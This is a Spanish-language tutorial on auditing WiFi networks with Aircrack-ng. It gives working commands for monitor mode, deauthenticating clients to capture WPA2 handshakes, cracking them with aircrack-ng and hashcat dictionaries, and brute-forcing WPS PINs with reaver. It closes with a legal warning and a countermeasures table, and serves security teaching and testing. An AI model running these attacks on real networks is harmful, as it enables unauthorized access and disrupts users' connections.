← Volver al inicio
WiFi WPA2 Aircrack-ng Wireless Auditoría

Auditoría de Redes Inalámbricas

15/05/2022

Guía de auditoría de seguridad en redes WiFi con Aircrack-ng: captura del handshake WPA2, cracking con diccionario y configuraciones inseguras como WPS y WEP.

⚠️ Aviso legal: Estas técnicas solo deben aplicarse sobre redes propias o con permiso explícito por escrito del propietario. El acceso no autorizado a redes WiFi es un delito penal.

1. Preparación — Modo monitor

# Listar interfaces WiFi:
iwconfig
airmon-ng

# Comprobar procesos que puedan interferir:
airmon-ng check

# Matar procesos conflictivos:
airmon-ng check kill

# Activar modo monitor:
airmon-ng start wlan0
# Crea la interfaz wlan0mon

# Verificar modo monitor:
iwconfig wlan0mon

2. Descubrimiento de redes

# Escanear todas las redes cercanas:
airodump-ng wlan0mon

# Información mostrada:
# BSSID:   MAC del punto de acceso
# CH:      Canal
# ENC:     Cifrado (WPA2, WEP, OPN)
# ESSID:   Nombre de la red
# #Data:   Paquetes de datos capturados
# STATION: Clientes conectados

3. Captura del handshake WPA2

# Capturar tráfico de la red objetivo:
airodump-ng -c [CANAL] --bssid [BSSID_AP] -w handshake wlan0mon
# Ejemplo:
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

# Esperar a que un cliente se conecte (handshake natural)
# O forzar desautenticación para capturar el rehandshake:
# (Abrir otra terminal)
aireplay-ng -0 5 -a [BSSID_AP] -c [MAC_CLIENTE] wlan0mon
# -0 5: enviar 5 paquetes deauth
# El cliente se desconecta y reconecta → capturamos el handshake

# Confirmar captura del handshake en la esquina superior derecha:
# "WPA handshake: AA:BB:CC:DD:EE:FF"

4. Cracking del handshake WPA2

# Con Aircrack-ng (CPU) + diccionario:
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap

# Con Hashcat (GPU, mucho más rápido):
# Convertir .cap a formato Hashcat:
hcxpcapngtool -o hash.hc22000 captura-01.cap

# Cracking con Hashcat WPA2:
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt

# Con reglas para aumentar el alcance:
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

5. Ataque WPS (PIN de 8 dígitos)

# Escanear redes con WPS activo:
wash -i wlan0mon

# Ataque por fuerza bruta al PIN WPS:
reaver -i wlan0mon -b [BSSID_AP] -vv

# Ataque Pixie Dust (más rápido en APs vulnerables):
reaver -i wlan0mon -b [BSSID_AP] -vv -K 1

6. Contramedidas WiFi

MedidaDescripción
Usar WPA3Protocolo más seguro. Usa SAE en lugar de PSK.
Contraseña larga y aleatoriaMínimo 20 caracteres. Imposible de crackear por diccionario.
Deshabilitar WPSWPS es vulnerable a ataques de fuerza bruta (PIN de 8 dígitos).
Red de invitadosSeparar dispositivos IoT y visitas de la red principal.
Filtrado MACSolo permite MACs autorizadas (evitable con MAC spoofing).
SSID ocultoNo publicar el nombre de la red (baja eficacia, fácil de descubrir).